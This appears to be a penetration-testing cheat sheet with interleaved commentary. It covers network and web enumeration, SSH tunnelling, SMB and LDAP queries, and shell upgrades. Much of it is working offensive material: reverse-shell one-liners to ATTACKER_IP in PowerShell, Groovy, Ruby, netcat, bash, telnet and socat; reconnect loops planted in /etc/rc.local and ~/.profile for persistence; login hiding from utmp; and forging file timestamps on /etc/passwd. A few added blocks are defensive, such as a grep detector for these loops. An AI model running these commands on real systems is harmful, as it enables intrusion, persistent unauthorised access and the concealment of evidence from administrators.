Network Scanning
$ nmap -A 10.10.10.150
-A enables OS detection, version detection, default script scanning, and traceroute
-sV = enumerate service versions
-sC = default script scan (same as --script=default)
-vv = verbosity
-oN/-oG/-oX = output file (normal/grepable/XML); -oA <basename> writes all three
-T5 = "insane" timing (fastest; -T4 is the documented "aggressive" level and is safer on lossy links, where -T5 silently drops results)
--script vuln = run the vuln category of NSE scripts
-p- = all 65535 ports (-p1-65534 misses port 65535)
$ nmap -sV -sT -Pn -sC -O 10.10.10.150 -p-
$ nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.150
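The full-range -sV -sC scans above are slow because version probing and scripts run against every port. An added example (not from the original page) of the usual two-stage pattern: a fast scan of all TCP ports saved in grepable format, then -sV -sC only on the ports that came back open. nmap must be installed; the target, the output file names and the --min-rate value are illustrative assumptions.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet.
# Stage 1: fast full-range scan, grepable output.  Stage 2: -sV -sC on open ports only.

# Turn an nmap -oG file into a comma-separated list of open TCP ports, e.g. "22,80,445".
# -oG lines look like:
#   Host: 10.10.10.150 ()  Ports: 22/open/tcp//ssh///, 80/open/tcp//http///
ports_from_gnmap() {   # ports_from_gnmap <file.gnmap>
    grep -o '[0-9][0-9]*/open/tcp' "$1" | cut -d/ -f1 | sort -un | paste -s -d , -
}

two_stage_scan() {   # two_stage_scan <target>
    target=$1
    # --min-rate 1000 is an assumed value; lower it on fragile or rate-limited networks.
    nmap -p- -T4 --min-rate 1000 -oG "quick_${target}.gnmap" "$target" >/dev/null
    ports=$(ports_from_gnmap "quick_${target}.gnmap")
    if [ -z "$ports" ]; then
        echo "no open TCP ports found on $target" >&2
        return 1
    fi
    echo "open ports: $ports" >&2
    # Only now spend time on version detection and default scripts.
    nmap -sV -sC -p "$ports" -oA "full_${target}" "$target"
}

# Usage: two_stage_scan 10.10.10.150
```

ports_from_gnmap only keeps lines matching /open/tcp, so filtered and closed ports from the grepable "Ports:" field are dropped before the second scan.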
$ wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --ss flag http://127.0.0.1/vuln.php?cmd=FUZZ
(-w wordlist is shorthand for -z file,wordlist; --ss shows only responses whose body contains the string "flag", handy for blind command-injection fuzzing)
$ wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/big.txt -z list,php-txt-html-zip-tar-tar.gz-7z --hc 403,404 -t 20 -u http://10.10.10.187/utility-scripts/FUZZ.FUZ2Z
$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://10.10.10.150
$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://jeff.thm/backups/ -t 20 -x zip,tar,gzip,php,txt,log
$ nikto -h 10.10.10.150
$ dirb http://10.10.10.150
SSH
#Almost invisible SSH
$ ssh -o UserKnownHostsFile=/dev/null -T user@host.org "bash -i"
With -T no pty is allocated, so your session is not written to /var/log/utmp (or wtmp) and you won't show up in w, who or last. Running "bash -i" as a command also bypasses .profile and .bash_profile (but not .bashrc). On your client side, UserKnownHostsFile=/dev/null stops the host key (and therefore the host name) from being written to ~/.ssh/known_hosts. It does not hide you from sshd itself: the authentication is still logged in auth.log / the journal on the server.
#SSH tunnel OUT
We use this all the time to circumvent local firewalls and IP filtering:
$ ssh -g -L31337:1.2.3.4:80 user@host.org
You or anyone else can now connect to your computer on port 31337 and get tunneled to 1.2.3.4 port 80 and appear with the source IP of 'host.org'.
We use this to give access to a friend to an internal machine that is not on the public Internet:
$ ssh -o ExitOnForwardFailure=yes -g -R31338:192.168.0.5:80 user@host.org
Anyone connecting to host.org:31338 will get tunneled to 192.168.0.5 on port 80 via your computer. Note that -g only affects listeners on your side (-L/-D); whether a -R listener on host.org binds to more than loopback is decided by the GatewayPorts option in host.org's sshd_config, and ExitOnForwardFailure makes the client quit instead of silently continuing when the remote bind fails.
#SSH socks4/5 OUT
Example: Tunnel all your browser traffic through your server.
$ ssh -D 1080 user@host.org
Now configure your browser to use SOCKS with 127.0.0.1:1080. All your traffic is now tunneled through host.org and will appear with the source IP of host.org.
#SSH socks4/5 IN
This is the reverse of the above example: reverse dynamic forwarding (-R with a port but no destination), supported since OpenSSH 7.6 on the client. It gives others access to your local network or lets others use your computer as a tunnel end-point.
$ ssh -g -R 1080 user@host.org
The others configure host.org:1080 as their SOCKS4/5 proxy. They can now connect to any computer on any port that your computer has access to. This includes access to computers behind your firewall that are on your local network.
SMB
To list all shares (-N = null session, no password prompt):
$ smbclient -N -L \\\\127.0.0.1\\
Show the ACL of a share's root directory (smbcacls takes //server/share followed by a path inside that share):
$ smbcacls -N //127.0.0.1/Users /
smbmap gives really good info about shares (permissions per share, recursive listing):
$ smbmap -u username -p pass1234 -d ECORP -H 127.0.0.1
$ smbmap -u invaliduser -H 127.0.0.1
(a non-existent user is a cheap way to test whether guest access is enabled)
Read more: https://www.it-vn.com/2020/04/windows-penetration-testing-cheat-sheet.html
LDAP
$ ldapsearch -x -h domain.name -s base namingcontexts
$ ldapsearch -x -h domain.name -s sub -b 'DC=DOMAIN,DC=NAME'
(the first anonymous query returns the naming contexts, which give you the base DN for the second; newer ldapsearch deprecates -h in favour of -H ldap://domain.name)
DNS Zone Transfer
$ dig axfr @TheDNSServerYouWanToAsk domain
Spawning TTY Shell
$ script -qc /bin/bash /dev/null # Linux
$ script -q /dev/null /bin/bash # BSD
or
$ python -c 'import pty; pty.spawn("/bin/sh")'
$ python3 -c 'import pty; pty.spawn("/bin/sh")'
then run /bin/bash -i inside it if you want bash rather than sh.
To make the pty fully interactive (tab completion, ctrl+c not killing the shell): press ctrl+z to background the netcat session, then in your local terminal
$ stty raw -echo; fg
$ export TERM=xterm
(stty raw -echo applies to your local terminal while the session is suspended; run reset afterwards if it is left in a bad state.)
$ nc -nvlp 4444
Create host to transfer file:
$ python -m SimpleHTTPServer <port eg:1337>   # Python 2
$ python3 -m http.server <port eg:1337>
Download: $ wget http://<host>:<port>/<file>
Reverse Shells
#powershell
$ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',ATTACKER_PORT);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
(run this from cmd.exe; typed at a PowerShell prompt, the outer shell expands $client, $stream etc. inside the double quotes before powershell.exe ever sees them)
#Java (Groovy syntax, e.g. for a Jenkins script console)
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKER_IP/ATTACKER_PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
#Ruby
$ ruby -rsocket -e'f=TCPSocket.open("ATTACKER_IP",ATTACKER_PORT).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
#Netcat
$ nc -e /bin/sh ATTACKER_IP ATTACKER_PORT
#Bash
$ bash -i >& /dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1
On the remote system, this command will connect back to your system (IP = ATTACKER_IP, Port ATTACKER_PORT) and give you a shell prompt:
$ setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 &
#Reverse shell without Bash
Especially embedded systems do not always have Bash and the /dev/tcp/ trick will not work. There are many other ways (Python, PHP, Perl, ..). Our favorite is to upload netcat and use netcat or telnet:
On the remote system:
$ nc -e /bin/bash -vn ATTACKER_IP ATTACKER_PORT
Variant if '-e' is not supported:
$ mkfifo /tmp/.io
$ sh -i 2>&1 </tmp/.io | nc -vn ATTACKER_IP ATTACKER_PORT >/tmp/.io
Telnet variant:
$ mkfifo /tmp/.io
$ sh -i 2>&1 </tmp/.io | telnet ATTACKER_IP ATTACKER_PORT >/tmp/.io
Telnet variant when mkfifo is not supported (Ulg!):
$ (touch /dev/shm/.fio; sleep 60; rm -f /dev/shm/.fio) &
$ tail -f /dev/shm/.fio | sh -i 2>&1 | telnet ATTACKER_IP ATTACKER_PORT >/dev/shm/.fio
#Socat
on attacker's host (listener)
$ socat file:`tty`,raw,echo=0 tcp-listen:ATTACKER_PORT
on target host (reverse shell)
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:ATTACKER_IP:ATTACKER_PORT
Read more: https://www.it-vn.com/2019/03/create-metasploit-payload-for-beginner.html
A reverse shell that keeps trying to connect back to us every 3600 seconds (indefinitely). Often used until a real backdoor can be deployed and guarantees easy re-entry to a system in case our connection gets disconnected.
$ while :; do setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1; sleep 3600; done &>/dev/null &
or add to /etc/rc.local:
$ nohup bash -c 'while :; do setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1; sleep 3600; done' &>/dev/null &
or the user's ~/.profile (also stops multiple instances from being started):
fuser /dev/shm/.busy &>/dev/null
if [ $? -eq 1 ]; then
nohup /bin/bash -c 'while :; do touch /dev/shm/.busy; exec 3</dev/shm/.busy; setsid bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT 0>&1 ; sleep 3600; done' &>/dev/null &
fi
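The flip side of the reconnect loops above, as an added example that is not part of the original cheat sheet: a quick check a defender (or a tester cleaning up) can run over startup files to find the /dev/tcp/ reverse-shell pattern and the setsid bash -i loop, plus the /dev/shm/.busy lock test. The file list and the regular expression are assumptions covering the snippets on this page, not a complete persistence audit.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet.
# Greps startup files for the /dev/tcp/ reverse-shell idiom used in the loops above.

# Print "file:line:content" (file prefix appears when more than one file is given)
# for every line mentioning /dev/tcp/ or "setsid bash -i".
find_devtcp_persistence() {   # find_devtcp_persistence <file>...
    grep -nE '/dev/tcp/|setsid[[:space:]]+bash[[:space:]]+-i' "$@" 2>/dev/null
}

# Number of matching lines across the given files; "0" when nothing was found.
count_devtcp_persistence() {   # count_devtcp_persistence <file>...
    find_devtcp_persistence "$@" | wc -l | tr -d ' '
}

# Is the lock file from the ~/.profile variant currently held open by a process?
# Returns 0 (and prints the PID list) only if a reconnect loop is holding it.
busy_lock_held() {   # busy_lock_held [lockfile]
    fuser "${1:-/dev/shm/.busy}" 2>/dev/null
}

# Usage on a live host (assumed locations; extend to cron, systemd units, etc.):
#   find_devtcp_persistence /etc/rc.local /etc/profile /root/.profile /home/*/.profile /home/*/.bashrc
#   busy_lock_held && echo "reconnect loop appears to be running"
```

Because the lock file is only ever touched and then held open with exec 3<, fuser reporting a PID on it is a stronger signal than the file merely existing.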
How to survive high latency connections
Hacking over long latency links or slow links can be frustrating. Every keystroke is transmitted one by one and any typo becomes so much more frustrating and time consuming to undo. rlwrap comes to the rescue. It buffers all single keystrokes until Enter is hit and then transmits the entire line at once. This makes it so much easier to type at high speed, correct typos, ...
Example for the receiving end of a reverse shell:
$ rlwrap nc -vnlp ATTACKER_PORT
Example for SSH:
$ rlwrap ssh user@host
File
#Restore the date of a file
Let's say you have modified /etc/passwd but the file date now shows that /etc/passwd has been modified. Use touch to change the file's timestamps to those of another file (in this example, /etc/shadow):
$ touch -r /etc/shadow /etc/passwd
This copies atime and mtime only. The ctime (change time) cannot be set from userland and is bumped to "now" by the touch itself, so stat /etc/passwd still reveals the recent change to anyone who looks at it.
#Encrypting a file
Encrypt your 0-Days and log files before transferring them - please. (and pick your own password):
Encrypt:
$ openssl enc -aes-256-cbc -pbkdf2 -k gwCMefVOewAJgfsFVa <input.txt >input.txt.enc
Decrypt:
$ openssl enc -d -aes-256-cbc -pbkdf2 -k gwCMefVOewAJgfsFVa <input.txt.enc >input.txt
gwCMefVOewAJgfsFVa is an example key. Keep -pbkdf2: without it openssl derives the key with a single MD5 iteration. Note that a key passed with -k ends up in your shell history and is visible in ps for as long as openssl runs; omit -k to be prompted, or use -pass file:/path or -pass env:VAR instead.
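Added example (not from the original page) of the same openssl commands with the passphrase read from a mode-600 file via -pass file: rather than from the command line, wrapped in a round-trip self-check on constructed data. It assumes an OpenSSL 1.1.1 or later binary (for -pbkdf2/-iter); the iteration count and file names are illustrative.

```shell
#!/bin/sh
# Added example, not part of the original cheat sheet.
# Password-based file encryption where the passphrase never appears in argv.

enc_file() {   # enc_file <passfile> <input> <output>
    # -iter raises the PBKDF2 work factor above openssl's default of 10000.
    openssl enc -aes-256-cbc -pbkdf2 -iter 200000 -salt \
        -pass "file:$1" -in "$2" -out "$3"
}

dec_file() {   # dec_file <passfile> <input> <output>
    openssl enc -d -aes-256-cbc -pbkdf2 -iter 200000 \
        -pass "file:$1" -in "$2" -out "$3"
}

# Create a random passphrase file readable only by the current user.
make_passfile() {   # make_passfile <path>
    : > "$1" && chmod 600 "$1" &&
    head -c 32 /dev/urandom | base64 | tr -d '\n' > "$1"
}

# Encrypt and decrypt a constructed sample file; returns 0 if the plaintext survives
# the round trip, non-zero otherwise.  Cleans up its temp directory either way.
roundtrip_check() {
    d=$(mktemp -d) || return 1
    make_passfile "$d/pass" || { rm -rf "$d"; return 1; }
    printf 'constructed sample loot line 1\nline 2\n' > "$d/in.txt"   # constructed input
    enc_file "$d/pass" "$d/in.txt" "$d/in.txt.enc" &&
    dec_file "$d/pass" "$d/in.txt.enc" "$d/out.txt" &&
    cmp -s "$d/in.txt" "$d/out.txt"
    rc=$?
    rm -rf "$d"
    return $rc
}

# Usage: make_passfile ~/.loot.pass; enc_file ~/.loot.pass dump.log dump.log.enc
```

Both sides must use the same -iter value, since openssl does not store the iteration count in the output; pick one and keep it in your notes alongside the passphrase.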